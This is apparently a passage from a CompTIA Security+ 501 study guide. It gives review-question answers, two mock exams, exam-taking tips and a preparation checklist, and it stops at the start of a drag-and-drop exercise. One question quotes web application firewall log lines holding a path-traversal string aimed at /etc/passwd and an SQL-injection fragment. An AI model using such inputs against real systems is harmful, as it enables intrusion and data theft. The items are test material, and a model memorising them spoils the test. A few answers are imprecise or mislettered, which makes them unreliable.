  6. Electromagnetic Interference (EMI) coming from motors, fluorescent lights, and radio frequencies interference affects a systems performance and could cause jamming to prevent IT system's working.

  7. EMI interferes with IT systems, but EMP destroys them.

  8. A company installs a UPS or a surge protector to reduce the threat of EMP.

  9. A Kiosk is a computer in a reception area or foyer that needs to be tied down so that only the displayed information about the building is available.

  10. A trusted operating system is a secure system normally used by the military where it has multiple layers of security as it is used to access classified data. It is tied down tightly and changes to the operating system are controlled.

  11. Apple iOS is an operating system for mobile devices such as the iPhone and the iPad, and Android is used by all other mobile telephones, such as Samsung.

  12. The first stage when we receive a new IT system or IoT device is to change the default administrator account and password.

  13. You disable unnecessary ports and services to harden the operating system and reduce the attack surface.

  14. A Security Technical Implementation Guides (STIG) is used by the military to ensure that operating systems are tied down tightly.

  15. You should use FDE to protect an external storage device against data theft.

  16. You should remove the memory card to reduce the attack surface on a digital camera.

  17. You should use sandboxing to test a bespoke application before moving it into production.

  1. The four stages when designing a new application are developing, testing, staging, and then production.

  2. Access violation is where a user is accessing data that they should not be able to see.

  3. You would first of all check that the certificate is valid and then check if it has been added to the Trusted Root Certification Authorities.

  4. A file would be larger and an image would be lighter in color.

  5. We can use DLP to prevent someone stealing PII or sensitive data.

  6. The most common authentication method that can be incorrectly configured is a username and password.

  7. We can use cable locks to prevent someone from stealing a laptop and a tablet.

  8. They are guilty of policy violation.

  9. Company information should never be posted on social media, such as Twitter or Facebook.

  10. Your internet bandwidth has increased and your local disk space has been reduced.

  11. License compliance violation is where you steal the license to an application and then install it on your desktop without consent.

  12. The fastest disaster recovery site is the hot site.

  13. No data can only be stored regionally; you would need a backup site in the USA.

  14. You should consider moving your hot site to the cloud.

  15. A tabletop exercise is a theory-based or paper-based disaster recovery exercise.

  16. An after-action report looks at how an incident happened and put measures in place to prevent re-occurrence, sometimes called lessons learned.

  17. The cheapest disaster recovery site is the cold site; it is the slowest to get back up and running as it has power and water and nothing else.

  18. Geotracking can tell you the location of a mobile device and geotagging puts the location on a picture and when it was taken.

Mock Exam 1

  1. What type of attack is a padding Oracle on downgrading legacy encryption attack? Choose two options from the following list:

A. IV attack

B. Replay attack

C. Man-in-the-middle attack

D. TLS 1.0 with electronic code book

E. SSL 3.0 with chain block cipher

  1. You are the security administrator for the British secret service. What type of access method will you use for secret and top-secret data?

A. You will use DAC, with the owner of the data giving access

B. You will use DAC, with the custodian of the data giving access

C. You will use DAC, with the security administrator giving access

D. You will use MAC, with the security administrator giving access


  1. Your company wants to encrypt the DNS traffic by using DNSSEC. Once you have signed the zone, what records are created for each host?

A. CNAME

B. AAAA

C. RRSIG

D. MX

E. PTR

  1. You are a security administrator. A user called Ben is having a discussion with one of his colleagues. They have four choices for two-factor authentication. They have asked for your advice as to which of the following is a two-factor authentication method. Select the best answer:

A. Smart card

B. Password and PIN

C. Passphrase and username

D. Retina and fingerprint scan

  1. Two separate CAs need to work together on a joint venture. What can they implement so that certificates can be used for cross certification?

A. Bridge trust model

B. Certificate pinning

C. Certificate stapling

D. Wildcard certificates



  1. John goes to a sports website and gets the following error:

THIS WEBSITE CANNOT BE TRUSTED.

What two actions does the website administrator need to take to resolve this error?

A. Ask the key escrow to store his private key

B. Ensure that the website uses a valid SAN certificate

C. Update the root certificate in the client computer certificate store

D. Verify that the certificate on the server has not expired

  1. A security administrator discovers that an attacker used a compromised host as a platform for launching attacks deeper into a company's network. What terminology best describes the use of the compromised host?

A. Brute force

B. Active reconnaissance

C. Pivoting

D. Passing point

  1. Mary is managing the company's wireless network, which will use WPA2-PSK. What kind of encryption is most likely to be used?

A. SHA-1

B. AES

C. MD5

D. DES


  1. Who is responsible for setting permissions when using a mandatory access control (MAC) model?

A. Owner

B. Manager

C. Administrator

D. User

  1. Company A is due to upgrade all of its IT systems, and has been investigating the possibility of moving to the cloud, as there is no capital expenditure because the CSP provides the hardware. Company A would still like to control the IT systems in the cloud. Which cloud model would best serve company A's needs?

A. Software as a Service (SaaS)

B. Infrastructure as a Service (IaaS)

C. Monitoring as a Service (MaaS)

D. Platform as a Service (PaaS)

  1. You are the security administrator and the IT director has tasked you with collecting the volatile memory on Server 1, as it currently under a cyberattack. Which of the following are the two best forms of volatile memory to collect?

A. Secure boot

B. Swap/page file

C. USB flash drive

D. ROM

E. RAM


  1. Bill and Ben are going to encrypt data using asymmetric encryption, which uses public and private keys. What is the first step they need to take?

A. Exchange public keys

B. Exchange private keys

C. Exchange digital signatures

D. Exchange telephone numbers

  1. At what stage in the SDLC are computer systems no longer supported by the original vendor?

A. Sandboxing

B. End-of-life systems

C. Resource exhaustion

D. System sprawl

  1. Company A has just developed a bespoke system for booking airline tickets. What is it called if a freelance coding specialist tests it for security flaws?

A. Code review

B. Static code review

C. Regression testing

D. Dynamic code review

  1. You are the security administrator for a company that has just replaced two file servers, and you have been tasked with the disposal of the hard drives that are used to store top-secret data. What is the best solution?

A. Hashing

B. Degauss

C. Low-level formatting

D. Shredding



  1. You are the security administrator for an airline company whose systems suffered a loss of availability last month. Which of the following attacks would most likely affect the availability of your IT systems?

A. Spear phishing

B. Replay

C. Man-in-the-middle (MITM)

C. DoS

  1. You are a network administrator setting up a L2TP/IPSec VPN tunnel, as your company needs to move a large amount of encrypted data between a branch office and the head office. Why is Diffie Hellman used for an IKE phase before the data is forwarded via symmetric encryption?

A. It is a symmetric encryption technique that protects keys

B. It is a hashing technique that protects keys

C It is an ephemeral technique that protects keys

D. It is an asymmetric technique that protects keys by setting up a secure channel

  1. You are a lecturer in a college and you need to deliver a session on salting passwords. What are the two main reasons you would salt passwords?

A. To prevent brute force attacks

B. To make access to the password slower

C. To prevent duplicate passwords being stored

D. To stop simple passwords from being used


  1. Which of the following methods of authentication are known as two-factor authentication?

A. PIN and passphrase

B. Mastercard and PIN

C. Username and password

D. Retina and facial recognition

  1. During a forensic investigation, the judge decrees that any data that is investigated should remain in its original form of integrity. Which of the following are used for the integrity of data? Choose two from the following list:

A. MD5

B. AES

C. SHA 1

D. DES

  1. Company A has suffered a distributed denial-of-service attack and, the company has decided that their RPO should be set at four hours. The directors are holding a board meeting to discuss the progress that is being made. During this meeting, the IT manager has mentioned the RTO, and the CEO looks confused. How can you explain the meaning of the RTO to the CEO?

A. Acceptable downtime

B. Return to operational state

C. Measure of reliability

D. Average time to repair

  1. The following is a list of different controls. Which of these are physical security controls?

A. Change management

B. Antivirus software

C. Cable locks

D. Firewall rules

F. Iris scanner

  1. The security team has identified an unknown vulnerability and isolated it. What technique is the best to use to investigate and test it?

A. Steganography

B. Fuzzing

C. Sandboxing

D. Containerization

  1. What is it called when a user has exploited an IT system so that he/she has obtained access to all files on the file server?

A. Remote exploit

B. Zero-day exploit

C. Privilege escalation

D. Pivoting

  1. You are the security administrator for your company, and the IT manager has asked you to brief him on XML authentication methods. Which of the following should you tell him uses XML-based authentication? Select all that apply:

A. TOTP

B. Federation services

C. Smart card


D. SSO

E. SOAP

F. SAML

  1. There is a group of certificates in a folder, and you need to identify which certificate uses the Privacy Enhanced Mail (PEM) format. Which of the following is the best choice to make?

A. PFX

B. CER

C. BASE 64

D. P12

  1. Three different companies want to develop an application for which they will share the cost of developing the resources and future running costs. Which cloud model best describes this?

A. Public cloud

B. Software as a Service (SaaS)

C. Private cloud

D. Platform as a Service (PaaS)

E. Infrastructure as a Service (IaaS)

F. Community cloud

  1. What type of keys does a key escrow manage?

A. Public

B. Session

C. Shared

D. Private


  1. Which of the following is an email-based attack on all members of the sales team?

A. Phishing

B. Vishing

C. Spear phishing

D. Pharming

  1. An attacker tries to target a high-level executive, but, unfortunately, has to leave a voicemail as the executive did not answer the telephone. What was the intended attack and what attack will eventually be used? Select all that apply from the following list:

A. Whaling

B. Vishing

C. Phishing

D. Spear phishing

  1. An auditor has been investigating the theft of money from a charity. He has discovered that the finance assistant has been embezzling money, as the finance assistant was the only person who dealt with finance by receiving donations and paying all of the bills. Which of the following is the best option that the auditor should recommend to reduce the risk of this happening again?

A. Hashing

B. Job rotation

C. Separation of duties

D. Mandatory vacations

E. Encryption


  1. You are a security administrator and, you have moved departments. You are now working with the certificate authority and training Mary, who is a new intern. Mary has asked you what the certificate object identifier (OID) consists of. What should you tell her?

A. Certificate-signing request

B. Certificate pinning

C. Certificate stapling

D. Certificate serial number

  1. You are the operational manager for a multinational corporation, and you are writing a policy in which you mention the RPO. Which of the following is the closest to the definition of an RPO?

A. Acceptable downtime

B. Return to operational state

C. A measure of the system reliability

D. Average time to repair

  1. You are carrying out annual training for your company and need to put a PowerPoint slide together on the symptoms of a backdoor virus. Which three points should you include in the slide? Each provides part of the explanation of a backdoor virus:

A. Programs will not open at all, even though you are clicking many times

B. You must click on several items

C. They can be included in an email attachment

D. Files open quicker than before

E. You can only get infected through a link on a web page


  1. You are a security administrator and need to set up a new wireless access point so that it is not backward compatible with legacy systems, as these may be vulnerable to attack, and it must be the strongest encryption that you can use. Which is the best solution that meets your needs?

A. WPA2 PSK

B. WPA TKIP

C. WPA2 TKIP

D. WPA2 CCMP

  1. Which of the following commands can be used to create a buffer overflow? Choose all that apply:

A. var char

B. strcpy

C. var data

D. strcat

  1. James has raised a ticket with the IT help desk; he has been tampering with the settings on his computer and he can no longer access the internet. The helpdesk technicians have checked the configuration on his desktop and the settings are the same as everyone else's. Suddenly, three other people have also reported that they also cannot connect to the internet. Which network device should be checked first?

A. Switch

B. Router

C. Hub

D. Repeater

  1. Which of the following is a secure wireless protocol that uses TLS?

A. NTLM

B. PAP

C. EAP

D. AES

  1. You are the security administrator for a multinational corporation, and the development team has asked your advice as to how to best prevent SQL-injection, integer-overflow, and buffer-overflow attacks. Which of the following should you advise them to use?

A. Input validation

B. A host-based firewall with advanced security

C. Strcpy

D. Hashing

  1. Your company is opening up a new data center in Galway, Ireland, where you have installed the server farm, and now a construction company has come in to put a six-foot mantrap in the entrance. What best describes the two main reasons why this mantrap is being installed?

A. To prevent theft

B. To prevent tailgating

C. To prevent unauthorized personnel gaining access to the data center

D. To allow faster access to the facility

  1. Which of the following devices can prevent unauthorized access to the network and prevent attacks from unknown sources?

A. Router

B. Load balancer

C. Web security gateway

D. UTM


  1. The Internet of Things (IoT) is a concept that has recently taken off. Which of the following devices fall under this category? Select all that apply:

A. ATM

B. Banking system

C. Smart TV

D. Refrigerator

E. Router

F. Wearable technology

  1. Which feature of DNS will help to balance a load without needing to install a network load balancer, or, when coupled with a load balancer, makes it more dynamic?

A. DNS CNAME

B. DNSSEC

C. DNS round robin

D. DNS SRV records

  1. What is the benefit of certificate pinning?

A. It prevents a certificate-signing request from a nonadministrator

B. It is used by a web server, and it bypasses the CRL for faster authentication

C. It stops people from spoofing, issuing certificates, or compromising your CA

D. It is used for cross certification between two separate root CAs

  1. An auditor has just finished a risk assessment of the company, and he has recommended that we need to mitigate some of our risks. Which of the following are examples of risk mitigation? Select all that apply:

A. Turning off host-based firewalls on laptops

B. Installing antivirus on a new laptop


C. Insuring your car against fire and theft

D. Outsourcing your IT to another company

E. Deciding not to jump into the Grand Canyon

  1. A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following will you choose?

A. L2TP/IPSec

B. SSL VPN

C. PPTP VPN

D. IKEv2 VPN

  1. You are the Active Directory administrator and you have been training new interns on the Kerberos ticket-granting ticket session. One of the interns has asked about the relationship between a service ticket and session ticket used by Kerberos authentication. Which of the following is the best description?

A. The user exchanges his service ticket with the server's session ticket for mutual authentication and single sign on

B. The service key is unencrypted and is matched with the value in the session ticket

C. The user shows the server his session ticket; and the server sends him a service ticket

D. The user shows the server his service ticket; and the server sends him a session ticket to keep

  1. Your company has a guest wireless network that can be used by visitors during the day, the sales staff in the evening, and the customer-service staff at lunchtime.

They set up a captive portal that fulfills the following criteria:

Guests do not need to authenticate



How will you set up your captive portal? Select three answers from the following list, where each answer provides part of the solution:

A. WEP 40 bit key

B. WPA2 TKIP

C. WPA-TKIP

D. Open-system authentication

E. WPA2 CCMP

F. WPS

  1. You are a security administrator, and the IT team has been using RSA for the encryption of all of its data, but has found that it is very slow. Which of the following should the security administrator recommend to improve the speed of the encryption?

A. Asymmetric encryption using DES

B. Asymmetric encryption using Diffie Helman

C. Symmetric encryption

D. Running a vulnerability scan to find a better solution

  1. Robert, who is an intern, has been assigned to the security team. A user has called him to ask who signs the X509 certificates. Which one of the following should Robert give as an answer?

A. CRL

B. Key escrow

C. CSR

D. CA

Mock Exam 2

  1. You are the security administrator for a large multinational corporation, and you have used a black box penetration tester to find vulnerabilities in your company and exploit them as far you can. During the penetration test, it was found that there were some vulnerabilities in your Windows 10 desktop operating system. There were no vulnerabilities in any of your Linux or Unix systems. Which of the following reason best describes why the penetration tester was successful with the Windows 10 machines, but not with the Linux or Unix?

A. Linux and Unix are more secure than Windows 10

B. The penetration tester did not attempt to exploit the Linux/Unix machines

C. The Linux and Unix operating systems never have any vulnerabilities

D. The operating systems' attack vectors are very different

  1. You are a security administrator and you wish to implement an encrypted method of authentication for your wireless network. Which of the following protocols is the most secure for your wireless network?

A. PAP

B. WPA2-PSK

C. EAP-TLS

D. PEAP


  1. You are designing the network topology for a new company that is rapidly expanding from a one-premise company with 20 users to a medium-sized company with 300 users. The company tells you that it was subjected to a DDoS attack last year that took the company down for over a day. In your network design, they don't want to implement a DMZ; therefore, the traffic will be coming direct from the internet. How do you propose to best mitigate against future DDoS attacks? Select two answers from the following list; each is part of the solution:

A. Install a stateless firewall on the edge of your network to prevent incoming traffic

B. Install a stateful firewall on the edge of your network to prevent incoming traffic

C. Install a NIDS in your network as an additional layer of protection

D. Install a NIPS in your network as an additional layer of protection

E. Install an inline NIPS in your network as an additional layer of protection

  1. You work on the cyber security team of a large multinational corporation, and you have been alerted to an attack on the web server inside your DMZ that is used for selling your products on the internet. You can see by running netstat that you have an unknown active connection. What should be the first step you take when investigating this incident?

A. Isolate the web server by disconnecting it from the network to prevent further damage

B. Disconnect all external active connections to ensure that any attack is stopped

C. Run a packet sniffer to capture the network traffic to identify the attacker

D. Take a screenshot of the damage done to the website and report the incident to the police


  1. I need to purchase a certificate that I can install on five mail servers. Which one should I purchase?

A. PEM certificate

B. Wildcard certificate

C. Subject Alternative Name (SAN) certificate

D. Root certificate

  1. You are the manager of a large IT company and it is your duty to authorize the administrative controls. Which of the following are actions that you would normally authorize? Select all that apply:

A. Collecting an ID badge

B. Creating an IT security policy

C. Purchasing a cable lock

D. Creating a new firewall rule

  1. You are the operational manager for a financial company, that has just suffered a disaster. Which of the following sites will you choose to be fully operational in the least amount of time?

A. Cold site

B. Warm site

C. Hot site

D. Campus site


  1. The serious crimes agency has just taken control of a laptop belonging to a well-known criminal that they have been trying to track down for the last 20 years. They want to ensure that everything is done by the book and no errors are made. What is the first step in their forensic investigation, prior to starting the chain of custody?

A. Making a system image of the laptop

B. Placing it in a polythene bag and sealing it

C. Hashing the data so that data integrity is assured

D. Asking for proof of ownership of the laptop

  1. If an attacker is looking for information about the software versions that you use on your network, which of the following tools could he/she use? Select all that apply:

A. Protocol analyzer

B. Port scanning

C. Network mapper

D. Baseline analyzer

  1. Footage of people relaxing in their homes started appearing on the internet without the knowledge of the people being filmed. The people being filmed were warned by relatives and coworkers, resulting in an enquiry being launched by the police. Initial evidence reported a similarity in that they had all recently purchased IoT devices, such as health monitors, baby monitors, smart TVs and refrigerators. Which of the following best describes why the attacks were successful?

A. The devices' default configurations were not changed

B. Their houses had been broken into and hidden cameras were installed

C. Their wireless networks were broadcasting beyond the boundaries of their homes

D. The manufacturers of the devices installed hidden devices allowing them to film


  1. You are the network administrator for an IT training company that has over 20 training rooms that are all networked together in their Miami office. Your corporate admin team could not access the internet last week as they were getting their IP settings from one of the training room's DHCP servers. The training manger has asked you to separate the corporate admin machines into their own network with a different IP range from the training rooms. What is the most secure way of implementing this? Select the best option from the following:

A. Create a VLAN on the switch and put the corporate admin team in the VLAN

B. Install a router in the LAN and place the corporate admin team in the new subnet

C. Create a NAT from the firewall and put the corporate machines in that network

D. Install a proxy server

  1. Your organization has many different ways of connecting to your network, ranging from VPN and RAS to 802.1x authentication switches. You need to implement a centrally managed authentication system that will log periods of access. Select the two most suitable methods of authentication from the following:

A. PAP

B. TACACS+

C. NTLM

D. RADIUS

  1. What is the major benefit of using imaging technology, such as Microsoft WDS server or Symantec Ghost, to image desktop computers and laptops that are being rolled out from a security perspective?

A. It provides a consistent baseline for all new machines

B. It ensures that all machines are patched

C. It reduces the number of vulnerabilities

D. It allows a nontechnical person to roll out the images

  1. A company that is allowing people to access their internet application wants the people who log into the application to use an account managed by someone else. An example of such an arrangement is using their Facebook account with a technology called Open ID Connect. Which of the following protocols is this based on? Select the best choice:

A. Kerberos

B. SAML

C. OAuth 2.0

D. Federation services

  1. You are the security administrator for a medium-sized company who need to enforce a much stricter password policy via group policy. The aims of this policy are to do the following:

Select the following options that you will need to use to fulfill all of these goals:

A. Enforce password history

B. Minimum password length

C. Passwords must meet complexity requirements

D. Minimum password age

E. Maximum password length

  1. You provide a service for people who have recently fulfilled their contract with their mobile phone provider to unlock their phone and then install third-party applications on it. They will then no longer be tied to using the mobile phone vendor's app store. Which of the following techniques will you use to achieve this? Select all that apply:

A. Tethering

B. Sideloading

C. Slipstreaming

D. Jailbreaking or rooting

E. Degaussing

  1. You are the security administrator of a multinational company that has recently prevented brute force attacks by using account lockout settings with a low value using group policy. The CEO of the company has now dictated that the company will no longer use account lockout settings as he read an article about it and got the wrong impression. Facing this dilemma, how can you ensure that you can make it more difficult for brute force to be successful?

A. Obfuscation

B. PBKDF2

C. XOR

D. bcrypt

  1. You want to join a wireless network using a password. Which of the following wireless features would be most appropriate to achieve this objective?

A. WPA2-Enterprise

B. WPA2-TKIP

C. WPS

D. WPA2-PSK

E. WPA2-CCMP

  1. What is the one main purpose of a network intrusion detection system (NIDS)? Select the most appropriate option:

A. Identifies vulnerabilities

B. Identifies new network hosts

C. Identifies viruses

D. Identifies new web servers

  1. A web server was the victim of an integer overflow attack. How could this be prevented in the future?

A. Install a proxy server

B. Install an SQL injection

C. Input validation on forms

D. Install a web application firewall

  1. You have recently set up a new virtual network with over 1,000 guest machines. One of the hosts is running out of resources, such as memory and disk space. Which of the following best describes what is happening?

A. Virtual machine escape

B. End of system lifespan

C. System sprawl

D. Poor setup

  1. You are the system administrator for a multinational company that wants to implement two-factor authentication. At present, you are using facial recognition as the method of access. Which of the following would allow you to obtain two-factor authentication? Select all that apply:

A. Palm reader

B. Signature verification

C. Thumb scanner

D. Gait

E. Iris scanner

  1. The security auditor has just visited your company and is recommending that change management reduces the risks from the unknown vulnerabilities of any new software introduced into the company. What will the auditor recommend to reduce the risk when you first evaluate the software? Select the best two practices to adopt from the following list:

A. Jailbreaking

B. Sandboxing

C. Bluesnarfing

D. Chroot jail

E. Fuzzing

  1. You are the security administrator for a multinational corporation. You recently detected and thwarted an attack on your network when someone hacked into your network and took full control of one of the hosts. What type of attack best described the attack you stopped?

A. Man-in-the-middle attack

B. Replay attack

C. Packet filtering

D. Remote exploit

  1. You are the security administrator for a multinational corporation and you recently carried out a security audit. Following the audit, you told the server administrators to disable NTLM on all servers. Which of the following types of attack best describes why you have taken this action?

A. It will improve the server's performance

B. To prevent a man-in-the-middle attack

C. To prevent a pass-the-hash attack

D. To prevent a poodle attack

  1. The political adviser to the Prime Minister of the United Kingdom has returned from the two months of summer break that all staff are entitled to. He has applied for an immediate transfer to another department, stating that his health is bad and the job was far too intense. When his replacement arrives, he finds that, during the summer recess, the political adviser has shredded all documents relating to a political inquiry that has involved his cousin. The police are immediately called in and say that they cannot prosecute the political adviser due to lack of evidence. What precautions could the Houses of Parliament because of a security team take to prevent further events such as this happening in the future?

A. Create a change-management document to ensure that the receptionists are more vigilant to people coming in out of hours

B. Enforce time-of-day restrictions so that nobody can access the IT systems during summer breaks

C. Enforce separation of duties to ensure that any document that is destroyed has been witnessed by a second person

D. Enforce mandatory vacations to prevent his coming in during the recess

  1. You work in the forensics team of a very large multinational corporation, where an attack has happened across three different sites in two different countries. You have been collecting the following log files from these locations:

What is the first action that you need to take when collating these logs?

A. Apply time normalization to these logs

B. Copy them into a worm drive so that they cannot be tampered with

C. Sort out the sequence of events by site

D. Raise chain of custody documentation for these logs

  1. You are an Active Directory administrator and have been having problems with the time synchronization that is used by the Kerberos authentication protocols. Consequently, you have now contacted a third party to provide your time synchronization. They use Stratum network time protocol (NTP) servers. What is the most secure method of setting up a Stratum server for time synchronization?

A. The servers should connect to an internal Stratum 1 NTP server

B. The servers should connect to an internal Stratum 2 NTP server

C. The servers should connect to an internal Stratum 0 NTP server

D. The servers should connect to an external Stratum 0 NTP server

  1. You are the network administrator for a company that runs an Active Directory domain environment where the system administrator is failing to keep you updated when new hosts are added to the network. You now decide that you will use your networking tools to:

Which of the following network-based tools provide the information that you require? Select the tools that you are most likely use:

A. Protocol scanner

B. Microsoft baseline analyser

C. Nmap

D. Penetration testing

  1. You are working for the serious crimes unit of the United Nations and have been given a laptop to investigate. You need to ensure that the evidence you are investigating has not been tampered with during your investigation. How are you going to prove this to the court when it is time to present your findings? Which of the following techniques will you adopt to best prove this? Select all that apply:

A. MD5

B. 3DES

C. SHA1

D. Blowfish

  1. You are the security administrator for a multinational corporation that has an Active Directory domain. What type of attack uses HTML tags with JavaScript inserted between the <script> and </script> tags?

A. Cross-site scripting

B. Man-in-the-middle

C. Cross-site forgery attack

D. SQL injection

  1. You are a system administrator working for a multinational company that has a Windows domain and is using an active passive model. Which of the following are the best reasons why your company would have adopted this model?

A. It provides vendor diversity

B. It provides much faster disaster recovery

C. It is the best model to use for symmetric encryption

D. It provides availability of your IT systems

  1. You are the system administrator for an Active Directory domain and deal with authentication on a daily basis. Which of the following do you use as an authentication method by entering a PIN instead of a password?

A. Smart card

B. Kerberos

C. WPS

D. TOTP

  1. You are the security administrator for a large multinational corporation and you have a meeting with the CEO about the security posture of the company. He wants you to ensure that the following are carried out effectively:

Which of the following is the best solution to implement? Select all that apply:

A. Robocopy firewall logs to a worm drive

B. Robocopy firewall logs to a RAID 5 volume

C. Implement usage auditing and reviews

D. Carry out permission audits and review every seven days

  1. You are the security administrator for a multinational company, and you know that one of your X509 certificates, used in at least 300 desktop machines, has been compromised. What action are you going to take to protect the company, using the least amount of administrative effort?

A. Email the people involved and ask them to delete the X509 from their desktop immediately

B. Carry out certificate pinning to prevent the CA from being compromised

C. Revoke the root CA X509 so it is added to the CRL

D. Revoke the X509 so it is added to the CRL

  1. You need to install a new wireless access point that should be as secure as possible with the functionality of being able to be used for backwards compatibility with legacy wireless systems:

A. WPA2 PSK

B. WPA

C. WPA2 CCMP

D. WPA2 TKIP

  1. You are the capacity planning administrator for a large multinational corporation, and find that Server 1 is running out of disk space, and, when you monitor its network card, you see that it is at 100% utilization. Which of the following reasons best describes what is happening?

A. There are hardware errors on the server

B. Unauthorized software is being downloaded

C. Event logs are getting full and slowing down the system

D. The disks that were selected were too small

  1. You are the security administrator and someone has just tried to attack your web server, which is protected by a web application firewall. When you look into the log files of the web application firewall, two of the rows of the log file have the following two entries:

var data = "<blackbeard> ++ </../etc/passwd>"

Select* from customers where 1=1

Which of the following attacks are most likely to be have been attempted? Select all that apply:

A. Integer overflow

B. SQL injection

C. JavaScript

D. Buffer overflow

  1. Data has been classified as internal data and external data. The company recently added two new classifications of data, legal and financial. What would be the benefit of these new classifications? Select the best solution for the new data classifications:

A. You need a minimum of three classifications for it to be effective

B. Better data classification

C. Quicker indexing

D. Faster searching

  1. You are the security administrator for a multinational corporation based in Miami, and your company has recently suffered a replay attack. After learning the lessons following the attack learned, you have decided to use a protocol that uses time stamps and USN to prevent replay attacks. Which of the following protocols is being implemented here? Select the best answer:

A. Federation services

B. EAP-TLS

C. Kerberos

D. RADIUS federation

  1. Which of the following threat actors would be the most likely to steal a company's research and development data?

A. Organised crime

B. Competitor

C. Script kiddie

D. Nation state

  1. You are a security administrator for a large multinational corporation based in the United Kingdom. You have just attended an annual seminar about the various types of password attacks. You have already disabled NTLM on all of the servers to prevent pass-the-hash attacks. Which of the following statements involved the storing passwords as a hash value?

A. A collision attack—the hash value and the data match

B. A collision attack—the hash values match

C. A rainbow-table attack performs a search of simple passwords

D. A rainbow-table attack performs a search of precomputed hashes

  1. You are the new IT director of a small, family-owned business that is rapidly expanding. You have submitted your annual budget for the IT team and the owners of the company want to know why you have asked for funds for vendor diversity. They have asked you to provide two good reasons as to why they should grant you the funds. Which of the following are the most suitable reasons why you wish to implement vendor diversity?

A. Reliability

B. Regulatory compliance

C. It is a best practice in your industry

D. Resiliency

  1. You are the network administrator for a large multinational corporation where you have captured packets that show that the traffic between the company's network devices is in clear text. Which of the following protocols could be used to secure the traffic between the company's network devices? Select all that apply:

A. SNMP V 3

B. SNMP

C. SCP

D. SFTP

  1. You are the auditor of a large multinational corporation and the SIEM server has been finding vulnerabilities on a server. Manual inspection proves that it has been fully hardened and has no vulnerabilities. What are the two main reasons why the SIEM server is producing this output?

A. There was a zero-day virus

B. False negatives

C. False positives

D. The wrong filter was used to audit

  1. You are a forensic investigator who has been called out to deal with a virus attack. You collect the information from the network card and volatile memory. After gathering, documenting, and securing the evidence of a virus attack, what is the best method to prevent further losses to the company?

A. Send a copy of the virus to the lab for analysis

B. Mitigate the attack and get the system back up and running

C. Initiate a chain of custody

D. Initiate business-impact analysis

  1. You are the purchasing manager for a very large multinational company, and you are looking at the company's policy dealing with the insurance of laptops. Last year, the company lost a record number of laptops. Your company is losing 10 laptops per month and the monthly insurance cost is $10,000. Which of the following laptop purchases would prevent you from purchasing insurance?

A. A budget laptop at $1,300 each

B. A budget laptop at $1,200 each

C. A budget laptop at $1,000 each

D. A budget laptop at $1,001 each

  1. Your company has suffered a system-sprawl attack, and you need to be able to identify what has caused the attack, and what the symptoms of the attack are. Which of the following attacks could cause system sprawl and what would be a tell-tale sign of it? Select the best two answers; each is a part of the solution:

A. SQL injection

B. DoS attack

C. CPU at 100% utilization

D. Buffer overflow

  1. Which of the following is a measure of reliability?

A. MTTR

B. MTBF

C. MTTF

D. RPO

  1. Which of the following are the characteristics of a third-party to third-party authentication protocol that uses XML based authentication? Select the best three answers:

A. Single sign on (SSO)

B. Kerberos

C. SAML

D. Federation services

Preparing for the CompTIA Security+ 501 Exam

This guide is to help students pass the Security+ exam first time. More resources, such as flashcards, virtual machines, and PowerPoint slides will be available at www.ianneil501.com.

The CompTIA Security+ 501 exam is a very tricky exam and the only way to pass it is by having a solid knowledge base and good analytical thinking.

The exam is 83 questions in 90 minutes and the pass mark is 750/900, which equates to 83.33%. I think you can get maybe 12-13 questions wrong, but nobody knows how the exam is scored as passes scored in the 750s are even, and 760, 770, 780 seem to be odd and don't increase in the same increments.

The exam will start with simulations that are graphics where you will drag and drop in the answers, usually with four or five different sections. I believe that you get partial points for dragging in a correct answer. To get a look and feel of what a simulation looks like, google Security+ 401 exam simulations under images and many will appear. This will give you an idea of what to expect, but these simulations will be very different as 501 is a different exam.

This book is designed with open questions at the end of each chapter since you need to know the material thoroughly to obtain certification. If we had used multiple choice all of the way through and you were good at guessing, you may have a false impression of your knowledge base. I will give you tips for the exam, followed by additional exam preparation material, including drag and drop practical exercises to help you tackle a simulation type of question, followed with some useful Linux commands.

Tips on taking the exam

When taking the exam, you need to read the question thoroughly and look at the grammar of the question, especially if you are a native English speaker as we tend to scan, and your answer must meet the objective of the question. Adopt a subtractive method by first of all ruling out the answers that are wrong and then select the correct answer; the hard way to tackle this exam is to immediately pick the right answer.

When you start the exam, the simulations will come first. If you are finding them tricky, go to the top right-hand corner and there will be a button saying something like flag for review, but do NOT attempt to answer it. Do this with any question you find difficult, no matter how large or small it is. When you have finished the 83rd question; it will automatically take you to the review screen. Don't waste time working out a difficult question; mark it up, bank your points, and then give yourself a chance when you are less pressured.

The review screen is larger than the display screen, therefore go to the top of the left-hand column and work your way down that column, then move onto the middle column and the right-hand column.

If you have not answered the review question, there will be a string in red saying something like you need to answer this question, making them very easy to spot. If you have answered the question, the review question will be a different color of blue than the questions that have been answered; this can be tricky if you are color blind. When it asks you if you are finished with the review, scroll up to the top where you should see 0/83 questions. If it says 2/83, then this means that you have not answered two questions. If you cannot answer a question correctly, give it your best shot since there is no penalty for putting in a wrong answer; you never know, you may guess correctly.

When you finish the exam, don't worry as it will go into a few screens where you answer questions based on your profile. However, when it thanks you, and you press next, that is the heart attack job as your score appears on the screen. In the middle of the screen, you will see a Security+ logo-look directly below it and look for the word congratulations—this is all you need to see. Anything else is a bonus.

Exam preparation

An exam preparation guide with a checklist, drag and drop questions, and Linux commands is given here. Follow the checklist to ensure that you are the best prepared that you can be:

Security +—Checklist

Ensure you hit the mark before testing

Task to complete

Date completed

Read Chapter 1Understanding Security Fundamentals, and score 100% on review questions


Read Chapter 2Conducting Risk Analysis, and score 100% on review questions


Read Chapter 3, Implementing Security Policies and Procedures, and score 100% on review questions


Read Chapter 4Delving into Identity and Access Management, and score 100% on review questions


Read Chapter 5, Understanding Network Components, and score 100% on review questions


Read Chapter 6, Understanding Cloud Models and Virtualization, and score 100% on review questions


Read Chapter 7, Managing Hosts and Applications Deployment, and score 100% on review questions


Read Chapter 8, Protecting Against Attacks and Vulnerabilities, and score 100% on review questions


Read Chapter 9, Implementing Public Key Infrastructure, and score 100% on review questions


Read Chapter 10, Responding to Security Incidents, and score 100% on review questions


Read Chapter 11, Managing Business Continuity, and score 100% on review questions


Score 100% on mock exam 1


Score 100% on mock exam 2


Score 100% on drag and drop—attacks


Score 100% on drag and drop—certificates


Score 100% on drag and drop—ports/protocols


Score 100% on drag and drop—authentication


Score 100% on drag and drop—general


Read and understand Linux commands


Read all exam tips in the book



Practical 1—drag and drop—attacks

Please place the answers against the description:

